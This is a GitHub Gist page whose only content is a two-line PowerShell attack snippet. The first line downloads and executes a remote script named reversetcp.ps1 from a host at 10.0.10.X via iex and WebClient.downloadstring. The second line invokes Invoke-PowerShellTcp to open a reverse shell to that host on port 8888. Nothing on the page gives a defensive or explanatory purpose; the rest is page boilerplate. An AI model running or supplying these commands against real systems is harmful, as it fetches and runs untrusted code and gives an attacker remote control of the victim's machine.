Created
January 3, 2023 20:38
-
-
Save C0axx/ac2ecc0ed536a8fcd985d1ce0d4f4843 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
iex (New-Object | |
Net.Webclient).downloadstring("http://10.0.10.X/reversetcp.ps1") | |
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment